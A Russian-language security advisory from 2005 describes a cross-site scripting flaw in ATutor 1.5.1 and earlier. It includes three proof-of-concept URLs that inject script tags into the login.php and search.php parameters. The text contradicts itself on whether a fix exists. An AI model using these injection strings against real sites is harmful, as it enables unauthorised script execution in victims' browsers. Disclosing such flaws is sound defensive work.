Межсайтовый скриптинг в ATutor

Дата публикации:
21.08.2005
Всего просмотров:
1225
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ATutor 1.x
Уязвимые версии: ATutor 1.5.1 и более ранние версии

Описание: Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит: http://[target]/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>

http://[target]/tour/search.php?search=1&search=1&words="><script>alert('There
is no other place like 127.0.0.1');</script>&include=all&find_in=all&d isplay_as=pages

http://[target]/tour/search.php?search=1&words="><script>alert('Found
By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Sea rch

URL производителя: http://www.atutor.ca/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA